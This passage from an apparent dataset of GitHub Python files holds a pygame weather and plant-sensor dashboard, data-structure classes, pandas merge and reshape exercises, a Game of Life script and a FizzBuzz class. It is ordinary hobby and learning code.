pygame.transform.scale(weathericon, (100, 100))\n #screen.blit(weathericon, (340, 10))\n elif int(x.strftime(\"%H\")) >= 17 or int(x.strftime(\"%H\")) <= 5:\n weathericon = pygame.image.load(imageDirectory + \"Moon1.png\")\n DNweathericon = pygame.transform.scale(weathericon, (100, 100))\n #screen.blit(weathericon, (340, 10))\n elif weathers == 'Snow':\n weathericon = pygame.image.load(imageDirectory + \"snow.png\")\n Wweathericon = pygame.transform.scale(weathericon, (100, 100))\n #screen.blit(weathericon, (220, 10))\n if 6 <= int(x.strftime(\"%H\")) <= 16:\n weathericon = pygame.image.load(imageDirectory + \"Sunny.png\")\n DNweathericon = pygame.transform.scale(weathericon, (100, 100))\n #screen.blit(weathericon, (340, 10))\n elif int(x.strftime(\"%H\")) >= 17 or int(x.strftime(\"%H\")) <= 5:\n weathericon = pygame.image.load(imageDirectory + \"Moon1.png\")\n DNweathericon = pygame.transform.scale(weathericon, (100, 100))\n #screen.blit(weathericon, (340, 10))\n elif weathers == 'Clear':\n weathericon = pygame.image.load(imageDirectory + \"Clear.png\")\n Wweathericon = pygame.transform.scale(weathericon, (100, 100))\n #screen.blit(weathericon, (220, 10))\n if 6 <= int(x.strftime(\"%H\")) <= 16:\n weathericon = pygame.image.load(imageDirectory + \"Sunny.png\")\n DNweathericon = pygame.transform.scale(weathericon, (100, 100))\n #screen.blit(weathericon, (340, 10))\n elif int(x.strftime(\"%H\")) >= 17 or int(x.strftime(\"%H\")) <= 5:\n weathericon = pygame.image.load(imageDirectory + \"Moon1.png\")\n DNweathericon = pygame.transform.scale(weathericon, (100, 100))\n #screen.blit(weathericon, (340, 10))\n return DNweathericon, Wweathericon, ColdHotMild\n\n\ndef displayWeatherData(imageDirectory, fontDirectory):\n temperature = pygame.font.Font(fontDirectory + 'NanumGothic-Regular.ttf', 75)\n Temps = temperature.render(str(int(temp)) + \" F\", 50, (255, 255, 255))\n temperaturelow = pygame.font.Font(fontDirectory + 'NanumGothic-Regular.ttf', 20)\n low = temperaturelow.render(str(int(templow))+ \" F\", 25, (255, 255, 255))\n temperaturehigh = pygame.font.Font(fontDirectory + 
'NanumGothic-Regular.ttf', 20)\n high = temperaturehigh.render(str(int(temphigh))+ \" F\", 25, (255, 255, 255))\n screen.blit(Temps, (20, 20))\n screen.blit(low, (330, 120))\n screen.blit(high, (400, 120))\n screen.blit(DNweathericon, (340, 10))\n screen.blit(Wweathericon, (220, 10))\n screen.blit(ColdHotMild, (20, 100))\n\ndef Title(imageDirectory, fontDirectory):\n Title = pygame.font.Font(fontDirectory + 'NanumGothic-Regular.ttf', 25)\n title = Title.render(\"Battery Life\", 50, (255, 255, 255))\n screen.blit(title, (250, 525))\n\n\ndef Time(imageDirectory, fontDirectory):\n z = datetime.datetime.now()\n screen.fill((0,0,0))\n Time = pygame.font.Font(fontDirectory + 'NanumGothic-Regular.ttf', 50)\n Time1 = pygame.font.Font(fontDirectory + 'NanumGothic-Regular.ttf', 25)\n Time2 = pygame.font.Font(fontDirectory + 'NanumGothic-Regular.ttf', 25)\n y = Time.render(z.strftime(\"%H:%M:%S\"), 50, (255, 255, 255))\n q = Time1.render(z.strftime(\"%b %d %Y\"), 50, (255, 255, 255))\n screen.blit(y, (780, 20))\n screen.blit(q, (790, 80))\n if 6 <= int(z.strftime(\"%H\")) <= 13:\n d = Time2.render(\"Good Morning!\", 50, (255, 255, 255))\n screen.blit(d, (790, 110))\n if 14 <= int(z.strftime(\"%H\")) <= 16:\n d = Time2.render(\"Good Afternoon!\", 50, (255, 255, 255))\n screen.blit(d, (790, 110))\n if int(z.strftime(\"%H\")) >= 17 or int(z.strftime(\"%H\")) <= 5:\n d = Time2.render(\"Good Evening!\", 50, (255, 255, 255))\n screen.blit(d, (790, 110))\n\nfinished = False\n\nurl = 'http://openweathermap.org/data/2.5/weather?q={}&appid=b6907d289e10d714a6e88b30761fae22'.format(\"Nashua\")\n\ni = 0\nprevious_temp = 0.0\nprevious_weathers = \"now\"\nprevious_time = 0\nprevious_temp = 0.0\nprevious_tempLow = 0.0\nprevious_tempHigh = 0.0\nvalues = {\n \"bool\": 0,\n \"time\": 1,\n \"place\": 2,\n \"plantname\": 3,\n \"humidity\": 4,\n \"temperature\": 5,\n \"wateranalog\": 6\n}\nlife = 1\nprevious = {\n \"place\": 0,\n \"plantname\": 0,\n \"humidity\": 0,\n \"temperature\": 0,\n \"wateranalog\": 0\n}\nnow = time.time()\nfuture = now + 10\ni = 0\nhumidity = 0\ntemperatures = 0\nwateranalog = 0\n\n## create control Panel object.\n#controlPanel_new = ControlPanel_main(previousImage, newImage)\npreviousRes = 0\nnewRes = 0\npreviousImage = imageDirectory + \"beginning.png\"\nnewImage = imageDirectory + \"beginning.png\"\nfirstTime = 0\ncontrolPanel_new = ControlPanel_main(previousImage, newImage)\n\nwhile not finished:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n finished = True\n if i == 0:\n temp, templow, temphigh, weathers = GetTempData(imageDirectory, fontDirectory)\n DNweathericon, Wweathericon, ColdHotMild = GetWeatherTempData(temp, templow, temphigh, weathers, imageDirectory, fontDirectory)\n Time(imageDirectory, fontDirectory)\n Title(imageDirectory, fontDirectory)\n new_time = int(time.time())\n if new_time - previous_time > 60:\n #print(\"timer exceeded\")\n #print(new_time)\n temp, templow, temphigh, weathers = GetTempData(imageDirectory, fontDirectory)\n if temp != previous_temp \\\n or templow != previous_tempLow \\\n or temphigh != previous_tempHigh \\\n or weathers != previous_weathers:\n #print(\"temp info is different\")\n DNweathericon, Wweathericon, ColdHotMild = GetWeatherTempData(temp, templow, temphigh, weathers, imageDirectory, fontDirectory)\n previous_temp = temp\n previous_temLow = templow\n previous_tempHigh = temphigh\n previous_weathers = weathers\n previous_time = new_time\n displayWeatherData(imageDirectory, fontDirectory)\n CarbonDioxide(1000, imageDirectory, 
fontDirectory)\n Megamanand10800A(imageDirectory, fontDirectory)\n ResetButton(imageDirectory, fontDirectory)\n ControlPanelButton(imageDirectory, fontDirectory, screen)\n finish = ControlPanelButton(imageDirectory, fontDirectory, screen)\n #print(\"hello\" + str(finish))\n r = requests.get(\"http://192.168.1.24:5263/\")\n text = r.text\n if \"

    \" in text:\n if i == 0:\n humidity = str(text[50:54])\n if humidity != \"None\":\n humidity = float(humidity)\n #print(humidity)\n if i == 1:\n temperatures = str(text[64:68])\n #print(temperature)\n if temperatures != \"None\": #o/r temperature != \"itio\":\n temperatures = float(temperatures)\n #print(temperature)\n if i == 2:\n wateranalog = str(text[78:81])\n if \"<\" in wateranalog:\n print(\"<\")\n wateranalog = str(text[78:79])\n if wateranalog != \"None\": # or wateranalog != \"itio\":\n wateranalog = float(wateranalog)\n #print(temperature)\n\n i = i + 1\n if i == 2:\n i = 0\n new = {\n \"place\": 0,\n \"plantname\": 0,\n \"humidity\": humidity,\n \"temperature\": temperatures,\n \"wateranalog\": wateranalog\n }\n if time.time() > future:\n for key in new.keys():\n if new[key] != previous[key]:\n print(\"not matching\")\n new1 = Data(\"1\", datetime.datetime.now(), new[\"place\"], new[\"plantname\"], new[\"humidity\"], new[\"temperature\"], new[\"wateranalog\"])\n new1.InsertData()\n future = future + 10\n previous[key] = new[key]\n if life == 0:\n x = Data(\"1\", datetime.datetime.now(), new[\"place\"], new[\"plantname\"], new[\"humidity\"], new[\"temperature\"], new[\"wateranalog\"])\n data = x.GetAllData()\n sum = 0\n average = 0\n i = 0\n for values in data[0:]:\n sum = sum + values[5]\n i = i + 1\n average = sum/i\n print(average)\n if finish == True:\n while True:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n finished = True\n if firstTime == 0:\n newRes, newImage = controlPanel_new.ControlPanel(event, previousRes)\n firstTime = firstTime + 1\n if previousRes != newRes:\n previousRes = newRes\n previousImage = newImage\n if event.type == pygame.MOUSEBUTTONDOWN:\n newRes, newImage = controlPanel_new.ControlPanel(event, previousRes)\n if previousRes != newRes:\n previousRes = newRes\n previousImage = newImage\n fini = controlPanel_new.Arrowbutton(event, screen)\n if fini == False:\n finish = False\n break\n pygame.display.flip()\n\n i = i + 1\n pygame.display.update()\n clock.tick(60)\n","repo_name":"AtulPhadke/Energy","sub_path":"app/mainscreen.py","file_name":"mainscreen.py","file_ext":"py","file_size_in_byte":21856,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"40924071251","text":"from typing import Any, Dict, Optional, List\n\nclass Stack:\n \"\"\"\n A class to create an instance of a Stack data structure with methods of insertion and deletion, based\n on First In Last Out principle.\n \"\"\"\n def __init__(self):\n self.stack = []\n\n def push(self, element: Any) -> List:\n \"\"\"Insert element at top of stack (end of list)\"\"\"\n return self.stack.append(element)\n\n def pop(self) -> List:\n \"\"\"Remove element from top of stack (end of list)\"\"\"\n return self.stack.pop()\n\n def length(self) -> int:\n \"\"\"Returns the length of the stack\"\"\"\n return len(self.stack)\n\n def empty(self) -> List:\n \"\"\"Empties the stack\"\"\"\n self.stack = []\n return self.stack\n\n def top(self) -> Any:\n \"\"\"Returns the top of the stack\"\"\"\n if len(self.stack) == 0:\n return None\n return self.stack[-1]\n\n def get_stack(self) -> List:\n return self.stack\n\n\nclass Queue:\n \"\"\"\n A class to create an instance of a Queue data structure with methods of insertion and deletion, based on\n First In First Out principle.\n \"\"\"\n def __init__(self):\n self.queue = []\n\n def enqueue(self, element) -> List:\n \"\"\"Insert element at the back of the queue (start of list)\"\"\"\n 
return self.queue.insert(0, element)\n\n def dequeue(self) -> List:\n \"\"\"Remove element from front of queue (end of list)\"\"\"\n return self.queue.pop()\n\n def length(self) -> int:\n \"\"\"Returns the length of the queue\"\"\"\n return len(self.queue)\n\n def empty(self) -> List:\n \"\"\"Empties the queue\"\"\"\n self.queue = []\n return self.queue\n\n def front(self) -> Any:\n \"\"\"Returns the value at front of the queue\"\"\"\n if len(self.queue) == 0:\n return None\n return self.queue[-1]\n\n def get_queue(self) -> List:\n \"\"\"Returns whole queue\"\"\"\n return self.queue\n\n\nclass Node:\n def __init__(self, data: Any) -> None:\n self.data = data\n self.next = None\n\n def __repr__(self):\n return self.data\n\n\nclass LinkedList:\n def __init__(self):\n self.head = None\n\n def __repr__(self):\n if self.head is None:\n return None\n else:\n n = self.head\n nodes = []\n while n is not None:\n nodes.append(n.data)\n n = n.next\n return str(nodes)\n\n def insert_at_start(self, data: Any) -> None:\n \"\"\"Creates new node, links the node to the current head, and replaces itself as new head\"\"\"\n new_node = Node(data)\n new_node.next = self.head\n self.head = new_node\n\n def insert_at_end(self, data: Any) -> None:\n \"\"\"Creates new node, checks if head is empty, if so create head. If not, loops through nodes until find one with\n no next node.\"\"\"\n new_node = Node(data)\n if self.head is None:\n self.head = new_node\n return\n\n n = self.head\n while n.next is not None:\n n = n.next\n n.next = new_node\n\n def insert_after_item(self, x: Any, data: Any) -> None:\n \"\"\"Inserts a node after a specific item, can be within the linked list.\"\"\"\n n = self.head\n while n is not None:\n if n.data == x:\n break\n n = n.next\n\n if n is None:\n print('List is empty')\n else:\n new_node = Node(data)\n new_node.next = n.next\n n.next = new_node\n\n def insert_before_item(self, x: Any, data: Any) -> None:\n \"\"\"Inserts a node before a specific item, can be within the linked list\"\"\"\n n = self.head\n if n is None:\n print(\"It's empty\")\n\n elif n.data == x:\n new_node = Node(data)\n new_node.next = n.next\n self.head = new_node\n\n else:\n while n is not None:\n if n.next.data == x:\n break\n n = n.next\n\n new_node = Node(data)\n new_node.next = n.next\n n.next = new_node\n\n def insert_at_index(self, index: int, data: Any) -> None:\n \"\"\"Inserts a node at a specific index\"\"\"\n if index == 0:\n new_node = Node(data)\n new_node.next = self.head\n self.head = new_node\n return\n i = 1\n n = self.head\n while i < index-1 and n is not None:\n n = n.next\n i = i+1\n if n is None:\n print(\"Index out of bound\")\n else:\n new_node = Node(data)\n new_node.next = n.next\n n.next = new_node\n\n def get_count(self) -> int:\n \"\"\"Returns the length of a linked list\"\"\"\n n = self.head\n if n is None:\n return 0\n\n count = 0\n while n is not None:\n count += 1\n n = n.next\n\n return count\n\n def search_element(self, val: Any) -> bool:\n \"\"\"Checks for an element in the linked list\"\"\"\n n = self.head\n if n is None:\n return False\n\n while n is not None:\n if n.data == val:\n return True\n else:\n n = n.next\n\n return False\n\n def delete_at_start(self) -> None:\n \"\"\"Deletes first node from the list.\"\"\"\n if self.head is None:\n print('List is empty')\n return\n self.head = self.head.next\n\n def delete_at_end(self) -> None:\n \"\"\"Deletes last node from the list.\"\"\"\n if self.head is None:\n print('List is empty')\n return\n\n n = self.head\n while n.next.next 
is not None:\n n = n.next\n n.next = None\n\n def delete_item_val(self, val: Any) -> None:\n \"\"\"Deletes item by value\"\"\"\n if self.head is None:\n print(\"List is empty\")\n return\n\n # Delete first item\n if self.head.data == val:\n self.head = self.head.next\n return\n\n # Delete any others\n n = self.head\n while n.next is not None:\n if n.next.data == val:\n break\n n = n.next\n\n if n.next is None:\n print(\"Item not found in list\")\n else:\n n.next = n.next.next\n\n def reverse_llist(self) -> None:\n prev = None\n n = self.head\n while n is not None:\n next = n.next\n n.next = prev\n prev = n\n n = next\n self.head = prev\n\n\n#\n#\n# llist = LinkedList()\n#\n# llist.insert_at_start(5)\n# llist.insert_at_start(4)\n# llist.insert_at_start(3)\n# llist.insert_at_start(1)\n#\n# print(llist)\n#\n# llist.insert_before_item(3, 2)\n#\n# print(llist)\n#\n# llist.reverse_llist()\n#\n# print(llist)","repo_name":"micullen/DataStructs-Algorithms","sub_path":"structs.py","file_name":"structs.py","file_ext":"py","file_size_in_byte":6819,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"21358673585","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Apr 2 13:56:55 2018\n\n@author: Teresa\n\"\"\"\nimport numpy as np\nimport pandas as pd\ndata = pd.Series(np.random.randn(9),\n index=[['a', 'a', 'a', 'b', 'b', 'c', 'c', 'd', 'd'],\n [1,2,3,1,3,1,2,2,3]])\ndata\ndata.index\ndata['b']\ndata['b':'c']\ndd = pd.Series(np.random.randn(5))\ndd[3:5]\ndata.loc[['b', 'd']] # .iloc only takes integer\ndd = pd.DataFrame(np.random.randn(5,4))\ndd.loc[[1,2], [2,3]]\ndd[[1,2]]\ndd\ndata\ndata.loc[:,2] # all of the first level, 2nd from all the second level think second level as columns\ndata.unstack() # rearrange data into a data frame\ndata.unstack().stack()\nframe = pd.DataFrame(np.arange(12).reshape((4, 3)),\n index=[['a', 'a', 'b', 'b'], [1, 2, 1, 2]],\n columns=[['Ohio', 'Ohio', 'Colorado'],\n ['Green', 'Red', 'Green']])\nframe\n# with a data frame, either axis can have a hierarchical index\nframe.index.names = ['key1', 'key2']\nframe.columns.names = ['state', 'color']\nframe\nframe['Ohio']\nframe.loc['a']\nfrom pandas import MultiIndex\nMultiIndex.from_arrays([['Ohio', 'Ohio', 'Colorado'], ['Green', 'Red', 'Green']], \n names=['state', 'color'])\n\nframe.swaplevel('key1', 'key2')\nframe.sort_index(level=1)\nframe.swaplevel(0,1).sort_index(level=0)\nframe.sum(level='key2')\nframe.sum(level='color', axis=1) # since color is column index, need to set axis=1\nframe = pd.DataFrame({'a': range(7), 'b': range(7, 0, -1),\n 'c':['one', 'one', 'one', 'two', 'two', 'two', 'two'],\n 'd':[0,1,2,0,1,2,3]})\nframe \nframe2 = frame.set_index(['c', 'd']) \nframe2\nframe.set_index(['c', 'd'], drop=False)\nframe2.reset_index()\ndf1 = pd.DataFrame({'key': ['b', 'b', 'a', 'c', 'a', 'a', 'b'],\n 'data1': range(7)})\ndf2 = pd.DataFrame({'key': ['a', 'b', 'd'], \n 'data2': range(3)})\ndf1\ndf2\npd.merge(df1, df2) # without specification, merge user the overlapping column names as keys\npd.merge(df1, df2, on='key')\ndf3 = pd.DataFrame({'lkey': ['b', 'b', 'a', 'c', 'a', 'a', 'b'],\n 'data1': range(7)})\ndf4 = pd.DataFrame({'rkey': ['a', 'b', 'd'],\n 'data2': range(3)})\npd.merge(df3, df4, left_on='lkey', right_on='rkey')\npd.merge(df1, df2, how='outer')\ndf1 = pd.DataFrame({'key': ['b', 'b', 'a', 'c', 'a', 'b'],\n 'data1': range(6)})\ndf2 = pd.DataFrame({'key': ['a', 'b', 'a', 'b', 'd'],\n 'data2': range(5)})\ndf1\ndf2\npd.merge(df1, df2, 
on='key', how='left')\npd.merge(df1, df2, how='inner')\nleft = pd.DataFrame({'key1': ['foo', 'foo', 'bar'],\n 'key2': ['one', 'two', 'one'],\n 'lval': [1, 2, 3]})\nright = pd.DataFrame({'key1': ['foo', 'foo', 'bar', 'bar'],\n 'key2': ['one', 'one', 'one', 'two'],\n 'rval': [4, 5, 6, 7]})\nleft\nright\npd.merge(left, right, on=['key1', 'key2'], how='outer')\npd.merge(left, right, on='key1')\npd.merge(left, right, on ='key1', suffixes=('_left', '_right'))\nleft1 = pd.DataFrame({'key': ['a', 'b', 'a', 'a', 'b', 'c'],\n 'value': range(6)})\nright1 = pd.DataFrame({'group_val': [3.5, 7]}, index=['a', 'b'])\nleft1\nright1\npd.merge(left1, right1, left_on='key', right_index=True) \n# 'key' is the column left data frame use to merge, \n# while right data frame user its index, hence right_index=True\npd.merge(left1, right1, left_on='key', right_index=True, how='outer')\nlefth = pd.DataFrame({'key1': ['Ohio', 'Ohio', 'Ohio',\n 'Nevada', 'Nevada'],\n 'key2': [2000, 2001, 2002, 2001, 2002],\n 'data': np.arange(5.)})\nrighth = righth = pd.DataFrame(np.arange(12).reshape((6, 2)),\n index=[['Nevada', 'Nevada', 'Ohio', 'Ohio','Ohio', 'Ohio'],\n [2001, 2000, 2000, 2000, 2001, 2002]],\n columns=['event1', 'event2']) \nlefth\nrighth\npd.merge(lefth, righth, left_on=['key1', 'key2'], right_index=True)\npd.merge(lefth, righth, left_on=['key1', 'key2'], right_index=True, how='outer')\nleft2 = pd.DataFrame([[1., 2.], [3., 4.], [5., 6.]],\n index=['a', 'c', 'e'],\n columns=['Ohio', 'Nevada'])\nright2 = pd.DataFrame([[7., 8.], [9., 10.], [11., 12.], [13, 14]],\n index=['b', 'c', 'd', 'e'],\n columns=['Missouri', 'Alabama'])\nleft2\nright2\npd.merge(left2, right2, how='outer', left_index=True, right_index=True)\nleft2.join(right2, how='outer') # join is merging by index, can be used to add columns\nleft1.join(right1, on='key') # left join\nanother = pd.DataFrame([[7., 8.], [9., 10.], [11., 12.], [16., 17.]],\n index=['a', 'c', 'e', 'f'],\n columns=['New York', 'Oregon'])\nanother\nleft2\nright2\nleft2.join([right2, another])\nleft2.join([right2, another], how='outer')\narr = np.arange(12).reshape((3, 4))\narr\nnp.concatenate([arr, arr], axis=1)\ns1 = pd.Series([0, 1], index=['a', 'b'])\ns2 = pd.Series([2, 3, 4], index=['c', 'd', 'e'])\ns3 = pd.Series([5, 6], index=['f', 'g'])\ns1\ns2\ns3\npd.concat([s1, s2, s3]) # by default concat works along axis=0\npd.concat([s1, s2, s3], axis=1)\ns4 = pd.concat([s1, s3])\ns4\ns1\npd.concat([s1, s4], axis=1)\npd.concat([s1, s4], axis=1, join='inner')\ns1\npd.concat([s1, s4], axis=1, join_axes=[['a', 'c', 'b', 'e']])\ns1\ns3\nresult = pd.concat([s1, s1, s3], keys=['one', 'two', 'three'])\nresult\nresult.unstack()\npd.concat([s1, s1, s3], axis=1, keys=['one', 'two','three'])\ndf1 = pd.DataFrame(np.arange(6).reshape(3, 2), index=['a', 'b', 'c'],\n columns=['one', 'two'])\ndf2 = pd.DataFrame(5 + np.arange(4).reshape(2, 2), index=['a', 'c'],\n columns=['three', 'four'])\ndf1\ndf2\npd.concat([df1, df2], axis=1, keys=['level1', 'level2'])\npd.concat({'level1':df1, 'level2':df2}, axis=1)\npd.concat([df1, df2], axis=1, keys=['level1', 'level2'],\n names=['upper', 'lower'])\ndf1 = pd.DataFrame(np.random.randn(3, 4), columns=['a', 'b', 'c', 'd'])\ndf2 = pd.DataFrame(np.random.randn(2, 3), columns=['b', 'd', 'a'])\ndf1\ndf2\npd.concat([df1, df2], ignore_index=True)\na = pd.Series([np.nan, 2.5, np.nan, 3.5, 4.5, np.nan],\n index=['f', 'e', 'd', 'c', 'b', 'a'])\nb = pd.Series(np.arange(len(a), dtype=np.float64),\n index=['f', 'e', 'd', 'c', 'b', 
'a'])\na\nb\nb[-1]=np.nan\nb\nnp.where(pd.isnull(a), b, a)\nb[:-2].combine_first(a[2:])\na.combine_first(b)\ndf1 = pd.DataFrame({'a': [1., np.nan, 5., np.nan],\n 'b': [np.nan, 2., np.nan, 6.],\n 'c': range(2, 18, 4)})\ndf2 = pd.DataFrame({'a': [5., 4., np.nan, 3., 7.],\n 'b': [np.nan, 3., 4., 6., 8.]})\ndf1\ndf2\ndf1.combine_first(df2)\n\ndata = pd.DataFrame(np.arange(6).reshape((2, 3)),\n index=pd.Index(['Ohio', 'Colorado'], name='state'),\n columns=pd.Index(['one', 'two', 'three'],name='number'))\ndata\nresult = data.stack()\nresult\nresult.unstack() # by default the innermost level is unstackerd, same with stack\nresult.unstack(0)\nresult.unstack('state')\ns1 = pd.Series([0, 1, 2, 3], index=['a', 'b', 'c', 'd'])\ns2 = pd.Series([4, 5, 6], index=['c', 'd', 'e'])\ndata2 = pd.concat([s1, s2], keys=['one','two'])\ndata2\ndata2.unstack()\ndata2.unstack().stack()\ndata2.unstack().stack(dropna=False)\ndata2\ndf = pd.DataFrame({'left': result, 'right': result + 5},\n columns=pd.Index(['left', 'right'], name='side'))\ndf\nresult\ndf.unstack('state')\ndf.unstack('state').stack('side')\n\ndata = pd.read_csv('../examples/macrodata.csv')\ndata.head()\nperiods = pd.PeriodIndex(year=data.year, quarter=data.quarter, name='date')\ncolumns = pd.Index(['realgdp', 'infl', 'unemp'], name='item')\ndata = data.reindex(columns=columns)\ndata.head()\ndata.index = periods.to_timestamp('D', 'end')\ndata.head()\nldata = data.stack().reset_index().rename(columns={0:'value'})\nldata.head()\npivoted = ldata.pivot(index = 'date', columns='item', values='value')\npivoted.head()\nldata['value2'] = np.random.randn(len(ldata))\nldata[:10]\npivoted = ldata.pivot('date', 'item')\npivoted.head()\npivoted['value'].head()\nldata.set_index(['date', 'item']).unstack('item')\ndf = pd.DataFrame({'key': ['foo', 'bar', 'baz'],\n 'A': [1, 2, 3],\n 'B': [4, 5, 6],\n 'C': [7, 8, 9]})\ndf\nmelted = pd.melt(df, ['key']) # indicate group indicators\nmelted\ndf.melt('key')\nreshaped = melted.pivot('key', 'variable', 'value')\nreshaped\nreshaped.reset_index()\npd.melt(df, id_vars=['key'], value_vars = ['A', 'B'])\npd.melt(df,value_vars=['A', 'B'])\npd.melt(df,value_vars=['key', 'A', 'B'])\n","repo_name":"littlesweet1129/learning","sub_path":"data_analysis/pydata-book/ch08.py","file_name":"ch08.py","file_ext":"py","file_size_in_byte":8783,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"41129928879","text":"import sys\ninput = sys.stdin.readline\n\nfor _ in range(int(input())):\n H ,W, N = map(int, input().split())\n q, r = divmod(N, H)\n if r==0:\n front = str(H)\n else:\n front = str(r)\n\n if (r != 0) and (q < 9):\n print(front + '0' + str(q+1) )\n elif (r == 0) and (q < 10):\n print(front + '0' + str(q))\n elif (r != 0) and (q >= 9):\n print(front + str(q+1) )\n elif (r == 0) and (q >= 10):\n print(front + str(q))","repo_name":"pgw928/TIL","sub_path":"algorithms/boj/mAth/10250.py","file_name":"10250.py","file_ext":"py","file_size_in_byte":467,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"11903251034","text":"import msvcrt\nimport threading\n\nfrom graphics import *\nfrom time import sleep\n\n# funcs\n# todo: init all cell (dead & alive)\n# todo: cell.enable()\n# todo: cell.disable()\n\nDEAD = color_rgb(10, 10, 50)\nALIVE = color_rgb(230, 255, 230)\n\n\ndef is_alive(cell):\n return cell.config['fill'] == ALIVE\n\n\ndef init_grid(dim):\n grid = [[0 for cell in range(dim)] for line in range(dim)]\n for i in 
range(dim):\n for j in range(dim):\n grid[i][j] = set_cell(i, j)\n return grid\n\n\ndef draw_grid(grid, dim, window):\n for i in range(dim):\n for j in range(dim):\n grid[i][j].draw(window)\n\n\ndef set_cell(x, y):\n cell = Rectangle(Point(x, y), Point(x + 1, y + 1))\n cell.setFill(DEAD)\n return cell\n\n\ndef enable_cell(grid, x, y):\n grid[x][y].setFill(ALIVE)\n return grid\n\n\ndef disable_cell(grid, x, y):\n grid[x][y].setFill(DEAD)\n return grid\n\n\ndef around_coords(x, y):\n coords = list()\n coords.append(Point(x, y + 1))\n coords.append(Point(x + 1, y + 1))\n coords.append(Point(x + 1, y))\n coords.append(Point(x + 1, y - 1))\n coords.append(Point(x, y - 1))\n coords.append(Point(x - 1, y + 1))\n coords.append(Point(x - 1, y))\n coords.append(Point(x - 1, y - 1))\n return coords\n\n\ndef in_binding(point: Point, dim):\n return point.x in range(dim) and point.y in range(dim)\n\n\ndef update_grid(grid, dim):\n for i in range(dim):\n for j in range(dim):\n # check 8 cells around\n alive_count = 0\n for coord in around_coords(i, j): # for each coord around\n if in_binding(coord, dim):\n rcell = grid[coord.x.__int__()][coord.y.__int__()]\n if is_alive(rcell):\n alive_count = alive_count + 1\n # decide cell's fate\n if alive_count == 3:\n grid = enable_cell(grid, i, j)\n elif alive_count == 4:\n grid = disable_cell(grid, i, j)\n return grid\n\n\ndef is_inside(point, cell):\n dl = cell.getP1() # down left corner\n ur = cell.getP2() # up right corner\n return dl.getX() < point.getX() < ur.getX() and dl.getY() < point.getY() < ur.getY()\n\n\ndef feel_click(grid, point, dim):\n for i in range(dim):\n for j in range(dim):\n if is_inside(point, grid[i][j]):\n enable_cell(grid, point.getX().__int__(), point.getY().__int__())\n return grid\n\n\ndef get_kbinput():\n global flag\n keystrk = input('Press a key \\n')\n # key doesn't continue until key is pressed\n print(\"You just pressed: \", keystrk)\n flag = False\n print('flag: ', flag)\n\ndef get_clicks(grid):\n global flag\n while flag:\n click_point = win.getMouse()\n grid = feel_click(grid, click_point, DIM)\n\n\nDIM = 32\n\nwin = GraphWin(\"grid\", 600, 600)\nwin.setCoords(0, 0, DIM, DIM)\n\n# default grid init\ngrid = init_grid(DIM)\n\ngrid = enable_cell(grid, 20, 20)\ngrid = enable_cell(grid, 21, 18)\ngrid = enable_cell(grid, 23, 18)\ngrid = enable_cell(grid, 22, 18)\ngrid = enable_cell(grid, 21, 20)\n\n# draw\ndraw_grid(grid, DIM, win)\n\n# live cells init todo: add enable cells by mouse clicking\n# flag = True\n# main_loop = threading.Thread(target=get_clicks, args=[grid])\n# exit_loop = threading.Thread(target=get_kbinput)\n#\n# main_loop.start()\n# exit_loop.start()\n\n# update cycle\nsleep(2)\nwhile True:\n grid = update_grid(grid, DIM)\n sleep(0.25)\n","repo_name":"TrueCookie/CtapooPy","sub_path":"cgol.py","file_name":"cgol.py","file_ext":"py","file_size_in_byte":3411,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"35762098435","text":"\"\"\"\nScript for running FizzBuzz game.\n\nFizzBuzz game:\n1) From 1 to max number, numbers are output\n2) If the number is divisible by 3 without remainder, it is replaced by «Fizz»\n3) If the number is divisible by 5 without remainder, it is replaced by «Buzz»\n4) If the number is divisible by 3 and 5 without remainder,\nit is replaced by «FizzBuzz»\n\nExample:\nFor max number is 16 the output will be:\n1, 2, Fizz, 4, Buzz, Fizz, 7, 8, Fizz, Buzz, 11, Fizz, 13, 14, FizzBuzz, 16\n\nReplacement options:\nInstead of 3, 5 and Fizz, Buzz 
can be other digits and strings\n\n\"\"\"\n\n\nclass FizzBuzzRunner:\n \"\"\"Run FizzBuzz game and print result strings\"\"\"\n\n __DEFAULT_REPLACEMENT_OPTIONS = {3: 'Fizz', 5: 'Buzz'}\n\n def __init__(self, max_number: int, replacement_options=None):\n if not replacement_options:\n replacement_options = self.__DEFAULT_REPLACEMENT_OPTIONS\n\n self.__max_number = max_number\n self.__replacement_options = replacement_options\n\n @staticmethod\n def __is_divided_without_remainder(divisible: int, divider: int) -> bool:\n \"\"\"True if divisible divide to divider without remainder.\n\n For example:\n 1) 6 % 3 - True\n 2) 10 % 5 - True\n 3) 7 % 3 - False\n 4) 11 % 5 - False\n\n \"\"\"\n\n return divisible % divider == 0\n\n def __get_string_or_number(self, number: int) -> str | int:\n \"\"\"Return string (if number divide without remainder) or number.\n\n Example for __replacement_options = {3: 'Fizz', 5: 'Buzz'}:\n 1) number = 2 -> return 2\n 2) number = 3 -> return Fizz\n 3) number = 5 -> return Buzz\n 4) number = 15 -> return FizzBuzz\n\n \"\"\"\n\n string = ''\n\n for digit, replacement_string in self.__replacement_options.items():\n if self.__is_divided_without_remainder(number, digit):\n string += replacement_string\n\n return string or number\n\n def __print_game_title(self) -> None:\n \"\"\"Print game's title\"\"\"\n\n print(\n f'\\nFizzBuzz with {self.__max_number} limit number and '\n f'{self.__replacement_options} options \\n'\n )\n\n @property\n def __result_values(self) -> tuple:\n \"\"\"Return result values after FizzBuzz running\"\"\"\n\n values = []\n\n for number in range(1, self.__max_number + 1):\n values.append(self.__get_string_or_number(number))\n\n return tuple(values)\n\n def run(self) -> None:\n \"\"\"Run game and print results\"\"\"\n\n self.__print_game_title()\n\n for value in self.__result_values:\n print(value)\n\n\nif __name__ == '__main__':\n FizzBuzzRunner(16).run()\n FizzBuzzRunner(28, {4: 'Argh', 7: 